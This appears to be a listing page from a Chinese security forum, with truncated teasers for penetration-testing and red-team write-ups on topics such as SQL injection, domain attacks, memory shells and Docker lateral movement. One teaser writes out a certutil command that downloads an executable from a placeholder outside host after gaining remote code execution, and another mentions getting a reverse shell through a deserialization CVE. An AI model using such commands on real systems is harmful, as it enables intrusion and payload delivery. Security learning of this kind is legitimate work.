宅家学习共523篇
网络资产测绘神器:AsamF聚合工具详解-山海云端论坛

网络资产测绘神器:AsamF聚合工具详解

工具简介: AsamF是一款集成多个网络资产测绘平台的搜索工具 AsamF,Asset survey and mapping 本程序仅供学习研究使用,请勿利用本程序损害任何个人或企业的利益,造成一切影响,开发者将不承...
子玺的头像-山海云端论坛子玺9天前
05110
SRC挖掘实战:探寻莫名其妙的漏洞及解决方案-山海云端论坛

SRC挖掘实战:探寻莫名其妙的漏洞及解决方案

前言 真实案例,文中所写漏洞现已经被修复,厚码分享也是安全起见,请各位大佬见谅哈! 案例一:奇怪的找回密码方式 某次漏洞挖掘的过程中,遇到某单位的登录框,按以往的流程测试了一下发现并...
子玺的头像-山海云端论坛子玺9天前
0317
攻防实战:一次顺畅的案例分析-山海云端论坛

攻防实战:一次顺畅的案例分析

真实案例,厚码见谅,有些步骤可能有些忘记,截图并不是很全面。 金蝶云星空RCE shell之后尝试上线(出网)certutil -urlcache -split -f http://xx.xx.xx.xx/test.exe c:\test.exe这里exe的...
子玺的头像-山海云端论坛子玺9天前
04712
发掘潜在的 Oracle 数据库注入漏洞-山海云端论坛

发掘潜在的 Oracle 数据库注入漏洞

因为需要具体数据,所以要深入利用,手工肯定不方便,所以直接上 Sqlmap: Sqlmap也可以扫出该注入点,但想要进一步查询数据时,却发现Sqlmap利用不起来,无法查出数据: 为了确定查询数据失败原...
子玺的头像-山海云端论坛子玺9天前
0378
内网渗透攻击技巧:突破云镜传递防护-山海云端论坛

内网渗透攻击技巧:突破云镜传递防护

外网打点 信息搜集 FTP匿名登录 发现有FTP匿名登录,连接查看 漏洞探测 搜索Xstream漏洞,发现 https://www.cnblogs.com/thelostworld/p/14810682.html 尝试CVE-2021-29505 反弹shell   &n...
子玺的头像-山海云端论坛子玺9天前
0467
攻防实战:一次演练总结及经验分享-山海云端论坛

攻防实战:一次演练总结及经验分享

0x01 外网打点 资产发现 多测绘平台搜索 https://hunter.qianxin.com/https://fofa.info/https://quake.360.cn/ 多语法搜索 假如某个目标站点为xxxx.com ,我们可以通过不同的语法进行资产搜集...
子玺的头像-山海云端论坛子玺9天前
0468
利用Veinmind和Jenkins实现零成本的自动化扫描方案-山海云端论坛

利用Veinmind和Jenkins实现零成本的自动化扫描方案

在 CI 集成各种安全能力的过程中,最为痛苦的便是面对成千上百的仓库和分支,需要手动修改各种配置文件来加入安全扫描的步骤;通常情况下,在 Jenkins CI 过程内想要引入容器安全检测,需要手动...
子玺的头像-山海云端论坛子玺9天前
0395
从零开始的内存马分析:掌握骑马反杀的技巧-山海云端论坛

从零开始的内存马分析:掌握骑马反杀的技巧

第三天,你看着windowsConfig.jsp,config.jsp,心里想着,可算抓到你了,这回要把你全部,全部都属于我,可是,当你正兴高采烈逐步分析的时候,却发现,自己的数据库早已沦陷。。。 0x00 序言 ...
子玺的头像-山海云端论坛子玺9天前
02811
攻防之战:深度回顾地级市某行业专项演练-山海云端论坛

攻防之战:深度回顾地级市某行业专项演练

2022.8.X单位突然通知参与某行业专项攻防演练,本着学习的目的参与了一波,特此记录。 1、打点 获得目标单位名称 先通过爱企查、天眼查等工具查询目标及目标下属单位信息 可以利用工具:ENEScan...
子玺的头像-山海云端论坛子玺9天前
04411
挑战HTB: Timelapse:渗透测试实战记-山海云端论坛

挑战HTB: Timelapse:渗透测试实战记

主机发现 端口扫描 通过nmap进行端口端侧,发现存在18个开放端口。
子玺的头像-山海云端论坛子玺9天前
04013
深入挖掘内网:域内信息收集与渗透攻击(上)-山海云端论坛

深入挖掘内网:域内信息收集与渗透攻击(上)

一、内网信息收集概述 进入内网后,首先需要对当前网络环境进行判断:• 我是谁:当前机器的角色• 这是哪:当前机器所处网络环境的拓扑结构 主要信息: 本机信息收集基础信息:内网网段信息,...
子玺的头像-山海云端论坛子玺9天前
04310
x微前台绕过鉴权执行sql分析-山海云端论坛

x微前台绕过鉴权执行sql分析

https://forum.butian.net/share/1892 /formmodel/mobile/mec/servlet/MECAdminAction.java /formmodel/mobile/manager/MobileUserInit.java /mobile/plugin/ecology/service/AuthService.java&...
子玺的头像-山海云端论坛子玺9天前
03011
深入探讨内网渗透:初识域基础与简单域搭建-山海云端论坛

深入探讨内网渗透:初识域基础与简单域搭建

前言:内网域环境是学习内网知识的重要的一环,理解域内的基础知识,以及搭建简单的域环境是学习内网的必备基础。 第一部分 内网基础知识点 内网也指局域网,是指在某一区域由多台计算机互连而...
子玺的头像-山海云端论坛子玺9天前
0426
Docker虚拟机横向移动渗透测试实战经验分享-山海云端论坛

Docker虚拟机横向移动渗透测试实战经验分享

本次渗透在几个docker虚拟机间多次横向移动,最终找到了一个可以进行docker逃逸的出口,拿下服务器。渗透过程曲折但充满了乐趣,入口是172.17.0.6的docker虚拟机,然后一路横向移动,最终在172....
子玺的头像-山海云端论坛子玺9天前
0479